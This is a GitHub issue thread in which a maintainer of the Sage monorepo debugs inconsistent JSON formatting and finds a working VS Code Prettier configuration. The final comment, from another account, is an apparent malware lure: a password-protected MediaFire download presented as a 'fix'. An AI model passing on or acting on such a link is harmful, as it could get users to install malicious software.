### ISSUE TITLE
[Bug] Identify and apply a single JSON formatting

### ISSUE THREAD

**Issue by tschaffter** [Sage-Bionetworks/sage-monorepo#2786]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### What product(s) are you seeing the problem on?

Sage Monorepo

### Current behavior

It appears that there are two different formatting styles being used for JSON files. This inconsistency unnecessarily increases the amount of code to review in PRs, making the review process more cumbersome.

### Observations

Files that have seen their format changing:

- `tsconfig.base.json`
  - The PR #2785 is formatting the file using the "compact" format (created by @sagely1 ). 
  - The PR #2767 previously formatted this file using the "expanded" format (created by @tschaffter )
  - The format of this file changes between different commits of @tschaffter, indicating that this issue originates at least from a configuration issue.
- `project.json`

### Anything else?

Cc: @sagely1 

### Are you developing inside the dev container?

- [X] I am using the dev container

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by tschaffter** [comment]
## Formatting when saving file in VS Code

In my environment, opening and saving the file `tsconfig.base.json` is saved using the expanded format. I tried to manually compact a line but saving the file reverted it back to the expanded format.

This formatting on saving is configured in `vscode/settings.json` and relies on the VS Code extension [Prettier - Code formatter](https://marketplace.visualstudio.com/items?itemName=esbenp.prettier-vscode).

For some reason, the extension does not seem to be installed in my dev container:

![image](https://github.com/user-attachments/assets/c8730e60-8424-455a-9361-7c3223f6cc9c)

**Comment by tschaffter** [comment]
See https://github.com/microsoft/vscode/issues/189221

Setting `json.format.enable` as suggested by @aeschli completely blocks JSON formatting, not only the formatting provided by `vscode.json-language-features` as requested by the OP. This means that Prettier doesn't work either.

**Comment by tschaffter** [comment]
Whatever I do, it seems that the default VS Code formatter for JSON kicks in, even if I configure `settings.json` to use the Prettier extension. Unless I set `json.format.enable` to false, but then I know that Prettier won't work either.

vscode.json-language-features syntax:
https://github.com/Microsoft/vscode/blob/main/extensions/json/syntaxes/JSON.tmLanguage.json

**Comment by tschaffter** [comment]
I found that specifying multiple languages for the same config as illustrated in https://github.com/microsoft/vscode/issues/138076 prevents Prettier from formatting JSON and JSONC files.

This does not work, i.e. the default VS Code JSON formatter is applied instead of Prettier (yet the syntax is valid according to the issue referenced above):

```
  "[json][jsonc]": {
    "editor.defaultFormatter": "esbenp.prettier-vscode",
    "editor.formatOnSave": true
  },
```

But this works:

```
  "[json]": {
    "editor.defaultFormatter": "esbenp.prettier-vscode",
    "editor.formatOnSave": true
  },
  "[jsonc]": {
    "editor.defaultFormatter": "esbenp.prettier-vscode",
    "editor.formatOnSave": true
  },
```

**Comment by tschaffter** [comment]
My VS Code version: 1.92.2

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
